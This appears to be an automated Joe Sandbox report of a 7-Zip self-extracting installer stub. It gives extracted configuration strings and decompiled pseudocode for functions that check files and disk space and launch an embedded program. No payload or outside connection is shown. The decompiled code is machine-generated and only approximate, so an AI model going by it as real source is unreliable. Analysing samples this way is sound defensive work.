sfxversion, xrefs: 00406277
AutoInstall, xrefs: 00406BC7, 00406C16
InstallPath, xrefs: 00406A5E
SelfDelete, xrefs: 00407098
7-Zip SFX, xrefs: 004070F9
" -, xrefs: 00406861
123456789ABCDEFGHJKMNPQRSTUVWXYZ, xrefs: 0040672A
\A, xrefs: 00406545
SfxVarSystemPlatform, xrefs: 004061EC
7ZipSfx.%03x, xrefs: 00406D0B
HelpText, xrefs: 004069DE
setup.exe, xrefs: 00406ECD, 00406ED2, 00406F5C
ExecuteOnLoad, xrefs: 00406AE0

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: ??3@$Window$??2@Message$CommandLineModuleTimer_wtollstrlenwsprintf$?_set_new_handler@@CreateDesktopDispatchFileFolderHandleKillLibraryLoadNamePathRectSpecialVersionmemcpywcsncpy
String ID: " -$123456789ABCDEFGHJKMNPQRSTUVWXYZ$7-Zip SFX$7ZipSfx.%03x$AutoInstall$BeginPrompt$BeginPromptTimeout$Delete$DA$DA$ExecuteFile$ExecuteOnLoad$FinishMessage$HelpText$HA$InstallPath$PreExtract$PA$RunProgram$SelfDelete$SetEnvironment$SfxAuthor$SfxString%d$SfxVarApiPath$SfxVarCmdLine0$SfxVarModulePlatform$SfxVarSystemLanguage$SfxVarSystemPlatform$Shortcut$Sorry, this program requires Microsoft Windows 2000 or later.$\A$hA$setup.exe$sfxconfig$sfxelevation$sfxlang$sfxtest$sfxversion$sfxwaitall$x86
API String ID: 15977253-2458474990
Opcode ID: 8767dc516883970037a4987c3f1b97cf4b8453f5929e14bf7f716f7e914a62a3
Instruction ID: e0054388adb9e1051384cab39e182934ba2a11f09d439c537bece9ac8bb84f3b
Opcode Fuzzy Hash: 8767dc516883970037a4987c3f1b97cf4b8453f5929e14bf7f716f7e914a62a3
Instruction Fuzzy Hash: 88929234A001059AEB15BB62DC55AEE3666EF40308F15803FFD06672E2DB3C9D91CB5E

Uniqueness

Uniqueness Score: -1.00%

Function 004029DA, Relevance: 21.3, APIs: 14, Instructions: 294
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

			E004029DA(signed int* _a4, long _a8, signed int* _a12, signed int _a16) {
				char _v16;
				signed int _v24;
				char _v28;
				long _v32;
				signed int _v36;
				short _v42;
				signed short _v44;
				signed int _v52;
				short _v58;
				signed int _v60;
				struct _SYSTEMTIME _v76;
				signed int _t108;
				intOrPtr* _t110;
				signed int _t111;
				signed int _t116;
				intOrPtr* _t119;
				intOrPtr* _t122;
				signed int _t123;
				intOrPtr* _t125;
				signed int _t126;
				intOrPtr* _t130;
				signed int _t131;
				signed int _t132;
				signed int _t136;
				signed int _t138;
				signed int _t141;
				signed int _t149;
				signed int _t150;
				signed int _t151;
				signed int _t152;
				signed int _t154;
				signed int _t161;
				signed int _t171;
				intOrPtr _t184;
				signed int* _t211;
				intOrPtr* _t213;
				intOrPtr* _t218;
				signed int _t219;
				intOrPtr _t221;

				_t221 =  *0x41e8cc; // 0x0
				if(_t221 == 0) {
					 *_a12 = 0;
					__eflags = _a16;
					if(_a16 == 0) {
						_t218 = _a4;
						_t211 = _t218 + 0x20;
						_t108 =  *_t211;
						_a4 = _t211;
						__eflags = _t108;
						if(_t108 != 0) {
							 *((intOrPtr*)( *_t108 + 8))(_t108);
							 *_t211 = 0;
						}
						_v60 = 0;
						_v58 = 0;
						_t110 =  *0x41e7c0; // 0xbc2608
						_v52 = 0;
						_t111 =  *((intOrPtr*)( *_t110 + 0x18))(_t110, _a8, 3,  &_v60);
						__eflags = _t111;
						if(_t111 == 0) {
							E00411B60(_t111,  &_v16);
							__eflags = _v60;
							if(_v60 == 0) {
								L50:
								_t219 =  *((intOrPtr*)( *_t218 + 0x1c))(_t218, 0x64);
								L51:
								_push(_v16);
								L004191B0();
								L52:
								goto L53;
							}
							__eflags = _v60 - 8;
							if(_v60 != 8) {
								goto L50;
							}
							E00411BE5( &_v16, _v52);
							_t119 = E00411AEC( &_v28, _t218 + 0xc,  &_v16);
							_t213 = _t218 + 0x24;
							E00411BE5(_t213,  *_t119);
							L004191B0();
							_v44 = 0;
							_v42 = 0;
							_t122 =  *0x41e7c0; // 0xbc2608
							_v36 = 0;
							_t123 =  *((intOrPtr*)( *_t122 + 0x18))(_t122, _a8, 9,  &_v44, _v28);
							_a16 = _t123;
							__eflags = _t123;
							if(_t123 == 0) {
								__eflags = _v44;
								if(_v44 != 0) {
									__eflags = _v44 - 0x13;
									if(_v44 == 0x13) {
										 *((intOrPtr*)(_t218 + 0x44)) = _v36;
										L20:
										_t125 =  *0x41e7c0; // 0xbc2608
										_t126 =  *((intOrPtr*)( *_t125 + 0x18))(_t125, _a8, 6,  &_v44);
										_a16 = _t126;
										__eflags = _t126;
										if(_t126 != 0) {
											goto L11;
										}
										__eflags = _v36;
										_t207 =  &_v44;
										 *(_t218 + 0x40) = 0 | _v36 != 0x00000000;
										_t130 =  *0x41e7c0; // 0xbc2608
										_t131 =  *((intOrPtr*)( *_t130 + 0x18))(_t130, _a8, 0xc,  &_v44);
										_a8 = _t131;
										__eflags = _t131;
										if(_t131 == 0) {
											_t132 = _v44 & 0x0000ffff;
											__eflags = _t132;
											if(_t132 == 0) {
												GetLocalTime( &_v76);
												_t170 = _t218 + 0x38;
												SystemTimeToFileTime( &_v76, _t218 + 0x38);
												L28:
												__eflags =  *(_t218 + 0x40);
												_t184 =  *_t213;
												if( *(_t218 + 0x40) == 0) {
													_t136 = E004044EA(_t184, _t170); // executed
													__eflags = _t136 - 0xffffffff;
													if(_t136 == 0xffffffff) {
														_t138 =  *((intOrPtr*)( *_t218 + 0x20))(_t218, 0x69, GetLastError());
														L17:
														_t219 = _t138;
														L18:
														E004114AA( &_v44);
														goto L51;
													}
													__eflags = _t136 - 1;
													if(_t136 == 1) {
														L31:
														E004114AA( &_v44);
														_push(_v16);
														L004191B0();
														_t219 = 0;
														goto L52;
													}
													_push(0x18);
													L004191BC();
													_t171 = 0;
													__eflags = _t136;
													if(_t136 != 0) {
														 *((intOrPtr*)(_t136 + 4)) = 0;
														 *_t136 = 0x41ab9c;
														_t67 = _t136 + 8;
														 *_t67 =  *(_t136 + 8) | 0xffffffff;
														__eflags =  *_t67;
														_t171 = _t136;
													}
													 *(_t218 + 0x1c) = _t171;
													__eflags = _t171;
													if(_t171 != 0) {
														 *((intOrPtr*)( *_t171 + 4))(_t171);
													}
													_t141 =  *(_t218 + 0x1c);
													 *(_t141 + 0x10) =  *(_t141 + 0x10) & 0x00000000;
													 *(_t141 + 0x14) =  *(_t141 + 0x14) & 0x00000000;
													__eflags = E00411412( *_t213, 1);
													if(__eflags != 0) {
														L48:
														E004010F2(_a4, _t171);
														 *_a12 = _t171;
														E004114AA( &_v44);
														_push(_v16);
														L004191B0();
														E004114AA( &_v60);
														_t116 = 0;
														goto L54;
													} else {
														_a8 = GetLastError();
														E00411BBA( &_v28, _t213);
														_t149 = E004038FB( &_v28, __eflags);
														__eflags = _t149;
														if(_t149 >= 0) {
															_v24 = _t149;
															 *((short*)(_v28 + _t149 * 2)) = 0;
															_t150 = E00404772(_v28, _v28);
															__eflags = _t150;
															if(_t150 != 0) {
																_t151 =  *(_t218 + 0x1c);
																 *(_t151 + 0x10) =  *(_t151 + 0x10) & 0x00000000;
																 *(_t151 + 0x14) =  *(_t151 + 0x14) & 0x00000000;
																_t152 = E00411412( *_t213, 1);
																__eflags = _t152;
																if(_t152 != 0) {
																	_push(_v28);
																	L004191B0();
																	goto L48;
																}
																_t154 =  *((intOrPtr*)( *_t218 + 0x20))(_t218, 0x6a, GetLastError());
																L41:
																_push(_v28);
																_t219 = _t154;
																L004191B0();
																__eflags = _t171;
																if(_t171 != 0) {
																	 *((intOrPtr*)( *_t171 + 8))(_t171);
																}
																goto L18;
															}
															_t154 =  *((intOrPtr*)( *_t218 + 0x1c))(_t218, 0x68);
															goto L41;
														}
														_t154 =  *((intOrPtr*)( *_t218 + 0x20))(_t218, 0x6a, _a8);
														goto L41;
													}
												}
												_t161 = E00404772(_t184, _t207);
												__eflags = _t161;
												if(_t161 != 0) {
													goto L31;
												}
												_push(0x68);
												L16:
												_t138 =  *((intOrPtr*)( *_t218 + 0x1c))(_t218);
												goto L17;
											}
											__eflags = _t132 - 0x40;
											if(_t132 == 0x40) {
												_t170 = _t218 + 0x38;
												_t170->dwLowDateTime = _v36;
												_t170->dwHighDateTime = _v32;
												goto L28;
											}
											_push(0x66);
											goto L16;
										}
										E004114AA( &_v44);
										_push(_v16);
										L004191B0();
										_t219 = _a8;
										goto L52;
									}
									_push(0x65);
									goto L16;
								}
								 *((intOrPtr*)(_t218 + 0x44)) = 0;
								goto L20;
							}
							L11:
							E004114AA( &_v44);
							_push(_v16);
							L004191B0();
							_t219 = _a16;
							goto L52;
						} else {
							_t219 = _t111;
							L53:
							E004114AA( &_v60);
							_t116 = _t219;
							L54:
							return _t116;
						}
					}
					return 0;
				}
				return 0x80004004;
			}

0x004029e3
0x004029e9
0x004029f8
0x004029fa
0x004029fd
0x00402a07
0x00402a0b
0x00402a0e
0x00402a10
0x00402a13
0x00402a15
0x00402a1a
0x00402a1d
0x00402a1d
0x00402a2a
0x00402a2e
0x00402a32
0x00402a37
0x00402a3d
0x00402a40
0x00402a42
0x00402a4e
0x00402a53
0x00402a57
0x00402d08
0x00402d10
0x00402d12
0x00402d12
0x00402d15
0x00402d1a
0x00000000
0x00402d1a
0x00402a5d
0x00402a62
0x00000000
0x00000000
0x00402a6e
0x00402a7d
0x00402a84
0x00402a89
0x00402a91
0x00402aa2
0x00402aa6
0x00402aaa
0x00402aaf
0x00402ab5
0x00402ab8
0x00402abb
0x00402abd
0x00402ad7
0x00402adb
0x00402ae2
0x00402ae7
0x00402b03
0x00402b06
0x00402b06
0x00402b17
0x00402b1a
0x00402b1d
0x00402b1f
0x00000000
0x00000000
0x00402b23
0x00402b27
0x00402b33
0x00402b36
0x00402b3e
0x00402b41
0x00402b44
0x00402b46
0x00402b60
0x00402b64
0x00402b66
0x00402b88
0x00402b8e
0x00402b96
0x00402b9c
0x00402b9c
0x00402ba0
0x00402ba2
0x00402bcd
0x00402bd2
0x00402bd5
0x00402d00
0x00402af1
0x00402af1
0x00402af3
0x00402af6
0x00000000
0x00402af6
0x00402bdb
0x00402bde
0x00402bb4
0x00402bb7
0x00402bbc
0x00402bbf
0x00402bc4
0x00000000
0x00402bc4
0x00402be0
0x00402be2
0x00402be7
0x00402bea
0x00402bec
0x00402bee
0x00402bf1
0x00402bf7
0x00402bf7
0x00402bf7
0x00402bfb
0x00402bfb
0x00402bfd
0x00402c00
0x00402c02
0x00402c07
0x00402c07
0x00402c0c
0x00402c0f
0x00402c13
0x00402c22
0x00402c24
0x00402cc9
0x00402ccd
0x00402cd8
0x00402cda
0x00402cdf
0x00402ce2
0x00402ceb
0x00402cf0
0x00000000
0x00402c2a
0x00402c34
0x00402c37
0x00402c3f
0x00402c44
0x00402c46
0x00402c76
0x00402c79
0x00402c80
0x00402c85
0x00402c87
0x00402c95
0x00402c98
0x00402c9c
0x00402ca6
0x00402cab
0x00402cad
0x00402cc0
0x00402cc3
0x00000000
0x00402cc8
0x00402cbb
0x00402c53
0x00402c53
0x00402c56
0x00402c58
0x00402c5e
0x00402c60
0x00402c69
0x00402c69
0x00000000
0x00402c60
0x00402c8e
0x00000000
0x00402c8e
0x00402c50
0x00000000
0x00402c50
0x00402c24
0x00402ba4
0x00402ba9
0x00402bab
0x00000000
0x00000000
0x00402bad
0x00402aeb
0x00402aee
0x00000000
0x00402aee
0x00402b68
0x00402b6b
0x00402b77
0x00402b7a
0x00402b7f
0x00000000
0x00402b7f
0x00402b6d
0x00000000
0x00402b6d
0x00402b4b
0x00402b50
0x00402b53
0x00402b58
0x00000000
0x00402b58
0x00402ae9
0x00000000
0x00402ae9
0x00402add
0x00000000
0x00402add
0x00402abf
0x00402ac2
0x00402ac7
0x00402aca
0x00402acf
0x00000000
0x00402a44
0x00402a44
0x00402d1b
0x00402d1e
0x00402d23
0x00402d25
0x00000000
0x00402d26
0x00402a42
0x00000000
0x004029ff
0x00000000

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc1afe5be42f235623400936b6fe8336f4e4b177ecdc8afcc9ceeb54367ad8d7
Instruction ID: c1d5b1038281741182b59f060de7432f6867be05cbf439a176d126074f28f510
Opcode Fuzzy Hash: cc1afe5be42f235623400936b6fe8336f4e4b177ecdc8afcc9ceeb54367ad8d7
Instruction Fuzzy Hash: A7B19271900205EFDB14DFA0D9889EE77B5BF08314F14846AF902BB2E1D778AD85DB58

Uniqueness

Uniqueness Score: -1.00%

Function 004044EA, Relevance: 6.0, APIs: 4, Instructions: 43
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004044EA(WCHAR* __ecx, FILETIME* __edx) {
				struct _WIN32_FIND_DATAW _v596;
				void* _t7;
				signed int _t8;
				intOrPtr _t9;
				FILETIME* _t20;

				_t20 = __edx; // executed
				_t7 = FindFirstFileW(__ecx,  &_v596); // executed
				if(_t7 != 0xffffffff) {
					_t8 = FindClose(_t7);
					if((_v596.dwFileAttributes & 0x00000010) == 0) {
						_t9 =  *0x41e778; // 0x1
						if(_t9 != 0) {
							if(_t9 != 2 || CompareFileTime( &(_v596.ftLastWriteTime), _t20) >= 0) {
								return 1;
							} else {
								goto L5;
							}
						}
						L5:
						return E004044BD();
					}
					SetLastError(0x10);
					return _t8 | 0xffffffff;
				}
				return 0;
			}

0x004044ff
0x00404501
0x0040450a
0x00404511
0x0040451e
0x0040452d
0x00404534
0x00404542
0x00000000
0x00000000
0x00000000
0x00000000
0x00404542
0x00404536
0x00000000
0x00404538
0x00404522
0x00000000
0x00404528
0x00000000

APIs

FindFirstFileW.KERNELBASE(00000000,?,00000000,-00000001), ref: 00404501
FindClose.KERNEL32(00000000), ref: 00404511
SetLastError.KERNEL32(00000010), ref: 00404522

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: Find$CloseErrorFileFirstLast
String ID:
API String ID: 4020440971-0
Opcode ID: 2e532512729200e784fa90409b54c7fc6bc467fc79d1b687fbef4cf578feb42b
Instruction ID: 20dcc56be40bd9a2dd23ceebfaf1f9b55074e9165e79c80e0b63e8a94ab0599c
Opcode Fuzzy Hash: 2e532512729200e784fa90409b54c7fc6bc467fc79d1b687fbef4cf578feb42b
Instruction Fuzzy Hash: F1F081F1A00114B7DB206638AC49BA637A89BC1729F140A77EB26F11D0D77CC945955E

Uniqueness

Uniqueness Score: -1.00%

Function 00409A19, Relevance: 4.6, APIs: 3, Instructions: 59
fileCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00409A19(void* __eax, WCHAR* _a4, intOrPtr _a8) {
				struct _WIN32_FIND_DATAW _v596;
				void* _t16;
				void* _t18;
				intOrPtr _t36;
				intOrPtr* _t38;

				_push(0x24);
				L004191BC();
				if(__eax == 0) {
					_t38 = 0;
				} else {
					_t38 = E00412603(__eax);
				}
				if(E004113D0(_a4) != 0) {
					_t36 = _a8;
					E004010F2(_t36, _t38);
					_t16 = FindFirstFileW(_a4,  &_v596); // executed
					if(_t16 == 0xffffffff) {
						if(_t38 != 0) {
							 *((intOrPtr*)( *_t38 + 0x14))(1);
						}
						_t18 = 1;
					} else {
						 *((intOrPtr*)(_t36 + 8)) = _v596.nFileSizeLow;
						 *((intOrPtr*)(_t36 + 0xc)) = _v596.nFileSizeHigh;
						FindClose(_t16); // executed
						_t18 = 0;
					}
					return _t18;
				} else {
					if(_t38 != 0) {
						 *((intOrPtr*)( *_t38 + 0x14))(1);
					}
					return 1;
				}
			}

0x00409a23
0x00409a25
0x00409a2d
0x00409a3a
0x00409a2f
0x00409a36
0x00409a36
0x00409a49
0x00409a5e
0x00409a64
0x00409a73
0x00409a7c
0x00409a9d
0x00409aa5
0x00409aa5
0x00409aaa
0x00409a7e
0x00409a84
0x00409a8e
0x00409a91
0x00409a97
0x00409a97
0x00000000
0x00409a4b
0x00409a4d
0x00409a55
0x00409a55
0x00000000
0x00409a5a

APIs

??2@YAPAXI@Z.MSVCRT ref: 00409A25
FindFirstFileW.KERNELBASE(0041E7B8,?,00000000,00000000,0041E7B8), ref: 00409A73
FindClose.KERNELBASE(00000000), ref: 00409A91

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: Find$??2@CloseFileFirst
String ID:
API String ID: 4002974997-0
Opcode ID: f8154f6a90c2cf80a953c36b8969c0cb3972aabed34ab7164f85348f10c42f5d
Instruction ID: 793d1416ce16d4dbbc7bac0da152af532d808b73086aa34ee1095b61dd29bce3
Opcode Fuzzy Hash: f8154f6a90c2cf80a953c36b8969c0cb3972aabed34ab7164f85348f10c42f5d
Instruction Fuzzy Hash: 2A110631700111ABCB20AF24DC08AAF77A4AF45714F00443AFC46EB2D1D738DC428FA9

Uniqueness

Uniqueness Score: -1.00%

Function 00402446, Relevance: 3.0, APIs: 2, Instructions: 41
windowCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00402446(void* __ecx, void* _a8, intOrPtr _a12) {
				intOrPtr _v8;
				union _ULARGE_INTEGER _v12;
				int _t13;
				WCHAR* _t20;
				void* _t22;
				void* _t25;

				_push(__ecx);
				_push(__ecx);
				if(( *0x41e774 & 0x00000001) != 0) {
					L8:
					SendMessageW( *0x41e8c4, 0x8001, 0,  &_a8);
					__eflags = 0;
					return 0;
				}
				_t13 = GetDiskFreeSpaceExW( *0x41e89c,  &_v12, 0, 0); // executed
				if(_t13 == 0) {
					goto L8;
				}
				_t25 = _v8 - _a12;
				if(_t25 > 0) {
					goto L8;
				}
				if(_t25 < 0) {
					L5:
					_t20 = 0x2a;
					if(E004096FF(E00403DC8(_t20), _t22, _t26) == 1) {
						 *0x41e774 =  *0x41e774 | 0x00000001;
						__eflags =  *0x41e774;
						goto L8;
					}
					 *0x41e728 = 0x6a;
					return 0x80004005;
				}
				_t26 = _v12.LowPart - _a8;
				if(_v12.LowPart >= _a8) {
					goto L8;
				}
				goto L5;
			}

0x00402449
0x0040244a
0x00402452
0x004024aa
0x004024bb
0x004024c1
0x00000000
0x004024c1
0x00402462
0x0040246a
0x00000000
0x00000000
0x0040246f
0x00402472
0x00000000
0x00000000
0x00402474
0x0040247e
0x00402480
0x00402490
0x004024a3
0x004024a3
0x00000000
0x004024a3
0x00402492
0x00000000
0x0040249c
0x00402479
0x0040247c
0x00000000
0x00000000
0x00000000

APIs

GetDiskFreeSpaceExW.KERNELBASE(?,00000000,00000000), ref: 00402462
SendMessageW.USER32(00008001,00000000,?), ref: 004024BB

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: DiskFreeMessageSendSpace
String ID:
API String ID: 696007252-0
Opcode ID: ab9cdcdd9b55208fec138a9dead6acff31393ca49536454abc1c7d8bd56cf985
Instruction ID: 8208958cd5f058e564b84d0c2d53d4d01197a59289713be1c569bcd397771c57
Opcode Fuzzy Hash: ab9cdcdd9b55208fec138a9dead6acff31393ca49536454abc1c7d8bd56cf985
Instruction Fuzzy Hash: EA014B34610204BAEB149B65DE4DF9A3BA9FB01724F108476F901EA1E0DABAE940CB1D

Uniqueness

Uniqueness Score: -1.00%

Function 0040206F, Relevance: 31.7, APIs: 11, Strings: 7, Instructions: 242
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 90%

			E0040206F(signed int* __ecx, intOrPtr __edx, signed int _a4, intOrPtr _a8, signed int _a12) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				char _v32;
				char _v44;
				char _v56;
				char _v68;
				char _v80;
				char _v92;
				char _v104;
				char _v120;
				void* _t55;
				signed int _t59;
				signed int _t60;
				signed int _t61;
				signed int _t62;
				signed int _t63;
				signed int _t64;
				signed int _t65;
				signed int _t66;
				signed int _t75;
				long _t77;
				long _t80;
				signed int _t88;
				signed int _t149;
				signed int* _t151;
				signed int _t152;
				signed int _t155;
				signed int _t156;
				void* _t157;

				_t151 = __ecx;
				_t159 = 0;
				_v20 = __edx;
				_v12 = 0;
				E00411B60(_t55,  &_v32);
				E0040433D( &_v120, __edx, 0, _v20);
				_v16 = 0;
				_v5 = 0;
				E0040562E(_t151, 0);
				_t152 =  *_t151;
				while(1) {
					L1:
					_t59 = E00404139(_t152, _t159, 0);
					_t159 = _t59;
					if(_t59 != 0) {
						break;
					}
					_t60 = E00404139(_t152, __eflags, 0);
					__eflags = _t60;
					if(__eflags != 0) {
						_v12 = _v12 | 0x00000001;
						_t152 = _t60;
						continue;
					}
					_t61 = E00404139(_t152, __eflags, 0);
					__eflags = _t61;
					if(__eflags != 0) {
						_t152 = _t61;
						__eflags =  *0x41e740; // 0x1
						if(__eflags != 0) {
							L10:
							_v12 = _v12 | 0x00010000;
						}
						continue;
						L11:
						_t63 = E00404139(_t152, __eflags, 2);
						_t149 = _t63;
						__eflags = _t149;
						if(__eflags != 0) {
							__eflags =  *0x41e458 - 0xffffffff;
							if(__eflags == 0) {
								_t156 = _t152 + 4;
								__eflags = _t156;
								__imp___wtol(_t156);
								 *0x41e458 = _t63;
							}
							_t152 = _t149;
							continue;
						}
						_t64 = E00404139(_t152, __eflags, 3);
						__eflags = _t64;
						if(__eflags != 0) {
							L17:
							_t152 = _t64;
							continue;
						}
						_t64 = E00404139(_t152, __eflags, 3);
						__eflags = _t64;
						if(__eflags != 0) {
							goto L17;
						}
						_t65 = E004041BE(_t152, __eflags);
						__eflags = _t65;
						if(__eflags != 0) {
							_t152 = _t65;
							_v16 = 1;
							continue;
						}
						_t66 = E00404226(_t152, __eflags);
						__eflags = _t66;
						if(__eflags != 0) {
							_t152 = _t66;
							_v16 = 2;
							continue;
						}
						_t150 = "\"";
						__eflags = _a4;
						if(_a4 == 0) {
							E00411C48( &_v32, _a8);
							goto L29;
						} else {
							__eflags =  *_t152 - 0x22;
							if( *_t152 == 0x22) {
								E00411BE5( &_v32, _t152);
							} else {
								E00411BE5( &_v32, "\"");
								E00411CA3( &_v32, _t152);
								E00411CA3( &_v32, "\"");
							}
							_t152 = E00405041();
							__eflags = _t152;
							if(_t152 != 0) {
								E00411CA3( &_v32, " ");
								L29:
								_t68 = E00411CA3( &_v32, _t152);
							}
						}
						E00411B60(_t68,  &_v56);
						E00411B84( &_v44, E0040310A(_v32,  &_v56));
						E0040562E( &_v56, __eflags);
						__eflags =  *0x41e8d8; // 0x0
						if(__eflags == 0) {
							_t75 = E00401C91(_v16);
							__eflags = _t75;
							if(_t75 == 0) {
								goto L42;
							} else {
								_t155 = _a12;
								__eflags =  *_t155;
								if(__eflags != 0) {
									E00411CA3( &_v44, _t155);
									while(1) {
										__eflags =  *_t155;
										if(__eflags == 0) {
											goto L36;
										}
										_t155 = _t155 + 2;
										__eflags = _t155;
									}
								}
								L36:
								E0040562E( &_v44, __eflags);
								__eflags = _v5;
								if(__eflags != 0) {
									_t144 = _v44;
									_t77 = E00401DCA(_v56, _v44, __eflags, _v12);
									__eflags = _t77;
									if(_t77 != 0) {
										SetLastError(_t77);
										goto L44;
									} else {
										goto L41;
									}
								} else {
									E00411B84( &_v68,  *((intOrPtr*)(E00411AEC( &_v80, E00411B08( &_v92, E00411B32( &_v104, _t150,  &_v56), L"\" "),  &_v44))));
									_push(_v80);
									L004191B0();
									_push(_v92);
									L004191B0();
									_push(_v104);
									L004191B0();
									_t144 = _v12;
									_t157 = _t157 + 0xc;
									_t88 = E00401CC0(_v68, _v12, __eflags, _v20); // executed
									_push(_v68);
									__eflags = _t88;
									if(_t88 == 0) {
										L004191B0();
										L44:
										__eflags =  *0x41e774 & 0x00000010;
										if(( *0x41e774 & 0x00000010) == 0) {
											L46:
											E0040976C(_t144, 1, 0x10, _v32);
										} else {
											_t80 = GetLastError();
											__eflags = _t80 - 0x4c7;
											if(_t80 != 0x4c7) {
												goto L46;
											}
										}
										E00405B62();
										_push(9);
										_pop(1);
									} else {
										L004191B0();
										L41:
										E00401C35();
										goto L42;
									}
								}
							}
						}
						_push(_v44);
						L004191B0();
						_push(_v56);
						L004191B0();
						E004030B1( &_v120);
						_push(_v32);
						L004191B0();
						return 1;
					}
					_t62 = E00404139(_t152, __eflags, 0);
					__eflags = _t62;
					if(__eflags != 0) {
						_t152 = _t62;
						goto L10;
					}
					goto L11;
				}
				_t152 = _t59;
				_v5 = 1;
				goto L1;
			}

0x00402077
0x00402079
0x0040207f
0x00402082
0x00402085
0x00402090
0x00402097
0x0040209a
0x0040209d
0x004020a2
0x004020a4
0x004020a4
0x004020ac
0x004020b1
0x004020b3
0x00000000
0x00000000
0x004020c5
0x004020ca
0x004020cc
0x004020ce
0x004020d2
0x00000000
0x004020d2
0x004020de
0x004020e3
0x004020e5
0x004020e7
0x004020e9
0x004020ef
0x00402106
0x00402106
0x00402106
0x00000000
0x0040210f
0x00402118
0x0040211d
0x0040211f
0x00402121
0x00402123
0x0040212a
0x0040212c
0x0040212c
0x00402130
0x00402137
0x00402137
0x0040213c
0x00000000
0x0040213c
0x0040214c
0x00402151
0x00402153
0x00402167
0x00402167
0x00000000
0x00402167
0x0040215e
0x00402163
0x00402165
0x00000000
0x00000000
0x00402170
0x00402175
0x00402177
0x00402179
0x0040217b
0x00000000
0x0040217b
0x00402189
0x0040218e
0x00402190
0x00402192
0x00402194
0x00000000
0x00402194
0x004021a0
0x004021a8
0x004021ab
0x004021f7
0x00000000
0x004021ad
0x004021ad
0x004021b1
0x004021ce
0x004021b3
0x004021b4
0x004021bd
0x004021c6
0x004021c6
0x004021df
0x004021e1
0x004021e3
0x004021ed
0x004021fc
0x00402200
0x00402200
0x004021e3
0x00402208
0x0040221c
0x00402224
0x00402229
0x0040222f
0x00402238
0x0040223d
0x0040223f
0x00000000
0x00402245
0x00402245
0x00402248
0x0040224b
0x00402251
0x0040225b
0x0040225b
0x0040225e
0x00000000
0x00000000
0x00402258
0x00402258
0x00402258
0x0040225b
0x00402260
0x00402263
0x00402268
0x0040226b
0x004022e5
0x004022eb
0x004022f0
0x004022f2
0x004022ff
0x00000000
0x00000000
0x00000000
0x00000000
0x0040226d
0x0040229d
0x004022a2
0x004022a5
0x004022aa
0x004022ad
0x004022b2
0x004022b5
0x004022ba
0x004022c0
0x004022c6
0x004022cb
0x004022ce
0x004022d0
0x004022da
0x00402305
0x00402305
0x0040230c
0x0040231b
0x00402322
0x0040230e
0x0040230e
0x00402314
0x00402319
0x00000000
0x00000000
0x00402319
0x0040232a
0x0040232f
0x00402331
0x004022d2
0x004022d2
0x004022f4
0x004022f4
0x00000000
0x004022f4
0x004022d0
0x0040226b
0x0040223f
0x00402332
0x00402335
0x0040233a
0x0040233d
0x00402347
0x0040234c
0x0040234f
0x0040235b
0x0040235b
0x004020fb
0x00402100
0x00402102
0x00402104
0x00000000
0x00402104
0x00000000
0x00402102
0x004020b5
0x004020b7
0x00000000

APIs

Part of subcall function 00411B60: ??2@YAPAXI@Z.MSVCRT ref: 00411B68

Part of subcall function 0040433D: GetCurrentDirectoryW.KERNEL32(00000000,00000000,0041E89C,?,?,00000000,00402095,00000000,0041E89C,?,00000000), ref: 0040435B
